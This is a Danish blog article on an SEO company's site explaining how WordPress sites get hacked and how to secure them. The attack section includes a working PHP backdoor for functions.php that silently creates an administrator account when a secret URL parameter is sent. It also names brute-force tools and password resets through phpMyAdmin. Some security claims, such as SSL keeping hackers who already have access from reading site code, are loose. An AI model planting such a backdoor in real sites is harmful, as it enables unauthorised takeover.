• WordPress

Hvordan hacker man WordPress?

  • Felix Rose-Collins
  • 9 min read
Hvordan hacker man WordPress?

Intro

Inden vi begynder denne artikel, vil vi gerne have dig til at vide, at hacking er ulovligt, og vi hverken motiverer eller opfordrer til ondsindede aktiviteter. Denne artikel er udelukkende beregnet til at få viden om, hvordan svindlere arbejder, og hvordan forskellige metoder til sikkerhed på webstedet er afgørende for at holde dem på afstand. Lad os diskutere:

  • Hvordan hacker svindlere WordPress?
  • Hvordan sikrer du dit WP-websted mod svindlere?

Så lad os uden videre gå i gang med emnet.

Hvordan hacker man WordPress Website Online?

How to Hack WordPress Website Online (Kilde: wpsecurityninja.com)

Brug af WPScan:

WPScan er en WP-sikkerhedsscanner, der hjælper webstedsejere med at kontrollere deres WordPress-websted for sårbarheder, men denne scanner bruges også af hackere til at opfylde deres motiver for at hacke websteder.

WPScan giver ejere og administratorer af websteder mulighed for at angive WP-brugerkonti og brute force-passwords, og er det første skridt i at få uautoriseret adgang til WP-konti.

Brute force username and password using WPScan (Brute force brugernavn og adgangskode ved hjælp af WPScan. Kilde: Medium)

MIM-angreb:

MIM-angreb (Man-in-middle) kan let udføres, hvis brugerne bruger samme LAN. Ikke-krypterede brugerlogins er et blødt mål, da alle oplysninger er synlige i klartekst.

Den software, der er involveret i disse typer angreb, kan finde kompromitterede temaer, plugins og kan opregne brugere.

MIM Attacks (Kilde: Medium)

SQL-injektioner:

SQL-injektionsangreb anses for at være de mest fremtrædende angreb, der bruges til at trænge ind på websteder. Disse angreb er rettet mod webstedets backend-gateways og giver hackere mulighed for at trænge ind i dem ved at implementere kompromitterede kommandoer.

SQL Injections (Kilde: secure.wphackedhelp.com)

Mød Ranktracker

Alt-i-en-platformen til effektiv SEO

Bag enhver succesfuld virksomhed ligger en stærk SEO-kampagne. Men med utallige optimeringsværktøjer og -teknikker at vælge imellem kan det være svært at vide, hvor man skal starte. Nå, frygt ikke mere, for jeg har lige det, der kan hjælpe dig. Jeg præsenterer Ranktracker alt-i-en platformen til effektiv SEO

Vi har endelig åbnet for gratis registrering til Ranktracker!

Opret en gratis konto

Eller logge ind med dine legitimationsoplysninger

Disse indtrængninger giver også hackere mulighed for at ændre databaser og kommandoer og slette eller stjæle oplysninger om webstedet.

Da disse SQL-angreb finder sårbare og ikke-patchede websteder, gør de hackeropgaven let og vellykket.

Ved hjælp af My SQL/cPanel:

Ved denne metode opretter hackere en falsk konto eller ændrer passwordet for en nuværende WP-webstedsbruger. Hackere forsøger at trænge ind via cPanel ved at åbne PhpMyAdmin. De er på udkig efter tabellen, der ender på _users, og finder den bruger, de ønsker at ændre.

Dette vil give dem mulighed for at ændre legitimationsoplysningerne for den bruger, som de planlægger at hacke. De sporer brugeren og ændrer brugerens adgangskode (fra user_pass-feltet) ved at åbne online MD5-generatoren og erstatte den med den ønskede kodeord og senere klikke på #.

Utilizing My SQL/cPanel (Brugernavne, brugernes hashede adgangskoder, deres e-mail-id osv. er alle gemt i databasetabellen wp_users. Kilde: firstsiteguide.com)

Brugernavne, brugernes hashede adgangskoder, deres e-mail-id osv. er alle gemt i databasetabellen wp_users.

Redigering af Functions.php:

Hackere har også adgang til cPanel for at ændre filen Functions.php. Ved at låse File Manager op, går de på jagt efter det aktive temas mappe. Fra mappen public_html/wp_content/themes sporer de temaet og redigerer functions.php ved at placere deres kompromitterede kode. Hackingen er allerede i gang, fordi en ny konto er blevet oprettet af hackerne. Når det er gjort, sletter de den kompromitterede kode.

Opret en ny brugerkonto via FTP:

Generelt hjælper FTP-konti webstedsejere med at generere en mappe på deres websted, som giver specifikke brugere mulighed for at uploade/downloade deres filer ved hjælp af deres loginoplysninger.

Disse filer kan også ses på internettet.

Trin for at oprette en FTP-konto på webstedet:

  • Indtast de ønskede data
  • Indtast brugernavnet for den nye FTP-bruger
  • Indtast adgangskoden til tildeling af konto til adgang via FTP
  • Indtast navnet på den mappe, du vil give adgang til via FTP
  • Skriv den ønskede MB-plads, som du ønsker at tildele denne mappe
  • Tryk senere på knappen "Opret" for at oprette den nye konto.

De nedenfor nævnte data skal indlæses af den nye bruger for at få adgang via FTP.


Adresse / værtsnavn / adresse: yourdomain.com eller ftp.yourdomain.com Bruger / bruger: user@yourdomain.com Adgangskode: El adgangskode, der er tildelt denne FTP-konto

Port: 21Navngiv mappen til upload/download af filer.


Den nye bruger vil have læse- og skrivetilladelser både til den valgte mappe og til alle de undermapper, den indeholder. Hvis du f.eks. opretter klientbrugeren og giver ham adgang til mappen / home / user / public_html

Indtrængen gennem bagdøren:

En ondsindet måde at trænge ind på webstedet på er via bagdøren. Uanset om det er en svindler, der ønsker at få adgang til dit websted, eller en offerbruger, der ønsker at genvinde adgang til sit websted via en bagdør, skal de begge følge nedenstående trin.

Mød Ranktracker

Alt-i-en-platformen til effektiv SEO

Bag enhver succesfuld virksomhed ligger en stærk SEO-kampagne. Men med utallige optimeringsværktøjer og -teknikker at vælge imellem kan det være svært at vide, hvor man skal starte. Nå, frygt ikke mere, for jeg har lige det, der kan hjælpe dig. Jeg præsenterer Ranktracker alt-i-en platformen til effektiv SEO

Vi har endelig åbnet for gratis registrering til Ranktracker!

Opret en gratis konto

Eller logge ind med dine legitimationsoplysninger

I tilfælde, hvor en ny brugerkonto oprettes via FTP eller en adgangskode nulstilles, men det giver ikke de ønskede resultater, kan brugeren ønske at hacke deres websted via en bagdør og få adgang til administrationen.

Trin for at oprette Backdoor:

  • Åbn filen functions.php, og indsæt nedenstående kode.
add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
  • Gem senere ændringer.

Crypto Jacking & Cryptocurrency Mining:

Populariteten af kryptovalutaer har givet anledning til nye cybertrusler som crypto-jacking, der også kaldes cryptocurrency mining malware.

Det at konfiskere en computer mod brugerens ønske og bevidsthed kaldes crypto-jacking. Ved crypto-jacking malware inficerer svindlerne brugerens computer med skadelig malware, der leveres via software til at kompromittere systemer og netværk.

Phishing:

Phishing er en metode, hvor svindlere narrer brugere med deres følsomme oplysninger (loginoplysninger, socialt kontonummer, pinkode, kreditkortoplysninger osv.) ved at udgive sig for at være juridiske personer. De benytter sig normalt af e-mails for at opfylde deres formål.

Eksempel: En svindler kan udgive sig for at være en pålidelig kilde og indsamle personlige data fra brugerne for at opfylde deres ønsker. De kan også indsætte et dårligt link i phishing-e-mailen og dirigere dem til et bedragerisk websted for at levere malware.

Malware:

Statistikker om WordPress-sikkerhed viser, at 4000 WP-websteder er inficeret af malware på grund af falske SEO-plugins.

Svindlere har ikke brug for en kilde til at levere malware. SEO-plugins, WP-temaer og mange andre faktorer på webstedet har motiveret hackere til at bruge den seneste WP-VCD-malware.

Selv phishing-e-mails er indgange til levering af malware.

Også her er hackernes motto det samme, nemlig at få fat i følsomme data fra brugerne ved at trænge ind i systemer og stjæle oplysninger.

WordPress Ransomware:

I WP-ransomware bruger hackere malware til at blokere brugernes adgang til systemer og netværk. Brugeren kan få adgangen tilbage ved at betale en løsesum, som hackeren kræver.

Eksempel: Et eksempel: Petya-angrebet, hvor hackeren krypterer dine filer og data og kræver løsepenge mod dekrypteringsnøglen.

Cross-Site Scripting (XSS)-angreb:

XSS-angreb udføres af hackere ved at indsætte skadeligt indhold på webstedet og dermed udnytte browseren. Dette angreb gør det muligt for hackeren at stjæle data fra cookies, ændre webstedets indhold og beslaglægge webstedet for at få fat i følsomme data.

Clickjacking:

Ved clickjacking gør hackeren et ondsindet forsøg på at kompromittere en knap/et link og motiverer brugeren til at klikke på det kompromitterede objekt. Dette giver hackeren mulighed for at udføre ondsindede kommandoer for at få adgang til brugerfølsomme data.

Spoofing:

Spoofing er et angreb, hvor en person forklæder sig som en troværdig identitet for at opnå ulovlige fordele for brugeren og narre ham til at indsende sine fortrolige oplysninger.

For at forhindre alle disse hackerangreb skal der træffes specifikke sikkerhedsforanstaltninger for at sikre dit WP-websted.

Hvordan sikrer du WordPress-webstedet mod hacking?

How to Secure WordPress Website from Hacking? (Kilde: envisagedigital.co.uk)

Ovenstående statistikker er nok til at vise WordPress' popularitet. Det er denne popularitet, der gør denne CMS-platform mere eftertragtet blandt hackere, som forsøger forskellige hackermetoder for at få adgang til WP-websteder og deres data.

Derfor er det vigtigt at vide, hvordan man forhindrer hackere i at få adgang til dit WP-websted.

Sikre dit WP-websted med et SSL-certifikat:

Når der indlæses data på webstedet, er det altid i ren tekst, som er let synlig for alle, herunder hackere. Dette kan være risikabelt, da hackere kan misbruge data fra dit websted.

SSL-certifikater (Secure Socket Layers) er de digitale certifikater, der hjælper med at sikre dit WP-websted med 256-bit kryptering og dermed konvertere dine webstedsdata til et kodet format.

Hackere kan ikke læse koder, selvom de har fået adgang til dit websted, og derfor er de tvunget til at forlade sådanne websteder.

Secure your WP site with SSL Certificate (Kilde: clickssl.net)

Vælg det ønskede mærke af SSL-certifikat (Comodo, Thawte, RapidSSL osv.), og installer det samme på dit WP-websted. I forbindelse med typen af SSL-certifikat skal du forstå domæner og underdomæner. Hvis dit WP-websted f.eks. har underdomæner, så kan et enkelt billigt Wildcard-certifikat, der kun koster 45 $/år cirka, sikre hele din digitale virksomhed.

Hurtig udstedelse, 2048-bit nøglekryptering, et løft i SEO, webstedets tillidssegl, 99 % browser/mobilkompatibilitet, refusionspolitik og garanti er nogle af de funktioner og fordele, der er forbundet med at installere Wildcard SSL-certifikater.

Forskellige mærker og muligheder for SSL-produkter, budgetvenlige priser og fremragende kundeservice er nogle af fordelene ved at henvende sig til ClickSSL-butikken for at sikre dit WP-websted.

Opdater dine medarbejdere:

Menneskelige fejl kan være katastrofale, så sørg altid for at holde dine medarbejdere opdateret om de seneste cybertrusler for at undgå, at de bliver sårbare.

Hvis dine medarbejdere kan spore de mistænkelige signaler fra et hacket websted i den indledende fase, kan de informere de berørte parter og forhindre, at dit websted og din virksomhed lider yderligere skade.

Brug to-faktor-autentificering (2FA):

Implementering af 2FA under login på webstedet er den mest afgørende måde at afværge brute force-angreb på. Ud over at tilføje endnu et lag af sikkerhed forhindrer de også webstedets og brugernes data.

Det skyldes, at hvis et sikkerhedslag er kompromitteret, skal svindleren invadere det andet lag for at få adgang til webstedet.

Det er en svær beslutning, og derfor ender svindlere i de fleste tilfælde med at flytte til andre dårligt sikrede websteder.

Tip: WP 2FA er et gratis WP-plugin, der giver et ekstra sikkerhedslag til dit WP-websted.

Revision af administratorbrugere med jævne mellemrum:

Dette er vigtigt for sikkerheden på dit WP-websted. Sørg for at kontrollere dine administratorbrugere regelmæssigt og krydstjekke deres adgangsrettigheder.

Sørg også for, at dine brugere og medarbejdere har begrænset adgang i forhold til deres opgaver for at forhindre sikkerhedsbrister.

Opdater WordPress Core regelmæssigt:

Uvidende om WP Core?

Lad mig fortælle dig, at WP Core indeholder alle de grundlæggende grundlæggende filer, der er nødvendige for at WP kan fungere.

Fillisten i WP zip-filen, der er downloadet fra WordPress.org

Update WordPress Core Regularly (Kilde: ithemes.com)

Disse kernefiler skal opdateres regelmæssigt efter udgivelsen af sikkerhedsopdateringer for at lappe alle sikkerhedssårbarheder.

Download WP-temaer og plugins fra troværdige kilder:

Dette er afgørende, fordi plugins kan være farlige, når de ikke er opdateret eller installeret fra ikke-troværdige kilder. I tilfælde af brug af gratis/betalte plugins skal du altid kontrollere nedenstående faktorer som f.eks:

  • Brugerbedømmelser og anmeldelser
  • Brugervenlighed
  • Kompatibilitet
  • Sikkerhed
  • Troværdighed

Download WP Themes & Plugins from Trustworthy Sources (Kilde: torquemag.io)

Den samme regel gælder også for installation af WP-temaer.

Opdater WP-temaer og plugins regelmæssigt:

Forældede eller udløbne WP-temaer og plugins udgør altid en trussel mod dit WP-websted, da de mister deres sikkerhedsstandarder. For at forhindre hackere i at bruge sådanne gateways til at sprede malware for at få adgang til webstedet, skal du sørge for at opdatere de temaer og plugins, der bruges på dit WP-websted, regelmæssigt.

Dette vil hjælpe plugin'et til at fungere korrekt og forblive synkroniseret med de nyeste versioner af WP.

Tip: På plugins-siden kan du se alle de installerede plugins og et link, der angiver "Aktiver automatisk opdatering" ved siden af hvert plugin. Slå det til for automatiske opdateringer.

Ændre standardadministratornavnet:

Hackere er alt for smarte, og de kan nemt trænge ind på dit WP-websted ved at bruge standardadministrationsnavnet. Det er altid at foretrække at ændre standardadministratorbrugernavnet for at forhindre hackere i at udføre brute-force-angreb for at få uautoriseret adgang til dit websted.

Giv begrænset adgang:

Giv aldrig mere end nødvendigt, og den samme regel gælder, når du giver brugere og medarbejdere adgang til webstedet.

Adgangskontrol er den vigtigste regel for webstedets og datasikkerheden, da den definerer, hvem der kan og hvem der ikke kan få adgang til webstedet. Bloker alle indgange til WP admin og andre kritiske koder og data for at sikre webstedets sikkerhed.

Begrænset adgang forbedrer ikke kun produktiviteten, men sikrer også dit websted mod skadelige indgange.

Opdater WordPress:

Når din WordPress ikke er opdateret, er dit websted i fare for at blive invaderet af hackere.

WordPress har 37 % af markedsandelen, og det bliver ved med at frigive opdateringer regelmæssigt for at rette sikkerhedshuller og fejl. Disse opdateringer omfatter også nye funktioner og forbedringer af de eksisterende, som er nyttige til at forbedre din hjemmesides ydeevne.

Mød Ranktracker

Alt-i-en-platformen til effektiv SEO

Bag enhver succesfuld virksomhed ligger en stærk SEO-kampagne. Men med utallige optimeringsværktøjer og -teknikker at vælge imellem kan det være svært at vide, hvor man skal starte. Nå, frygt ikke mere, for jeg har lige det, der kan hjælpe dig. Jeg præsenterer Ranktracker alt-i-en platformen til effektiv SEO

Vi har endelig åbnet for gratis registrering til Ranktracker!

Opret en gratis konto

Eller logge ind med dine legitimationsoplysninger

Why you should always update your wordpress (Kilde: wpbeginner.com)

Hold dit WP-websted opdateret for at opnå en robust sikkerhed.

Afslutning:

Brug stærke og komplekse adgangskoder, og hold dit WP-websted samt plugins og temaer opdateret for at rette alle sikkerhedsbrister. Tag dig tid til at uddanne dine medarbejdere, da det altid vil hjælpe med at forebygge katastrofer.

Gå aldrig for let på sikkerheden, og sørg altid for at bruge de bedste og mest pålidelige sikkerhedsplugins for at holde dit WP-websted sikkert mod nysgerrige øjne. Derudover skal du sikre dit websted med SSL for at øge kundernes tillid, forretning og SEO.

Nu hvor du er klar over, hvordan hackere fungerer, håber vi, at denne artikel hjælper dig med at forhindre hackere i at trænge ind på dit websted og med at administrere dit WP-websted på en sikker måde.

Felix Rose-Collins

Felix Rose-Collins

Ranktracker's CEO/CMO & Co-founder

Felix Rose-Collins is the Co-founder and CEO/CMO of Ranktracker. With over 15 years of SEO experience, he has single-handedly scaled the Ranktracker site to over 500,000 monthly visits, with 390,000 of these stemming from organic searches each month.

Begynd at bruge Ranktracker... Gratis!

Find ud af, hvad der forhindrer dit websted i at blive placeret på ranglisten.

Opret en gratis konto

Eller logge ind med dine legitimationsoplysninger

Different views of Ranktracker app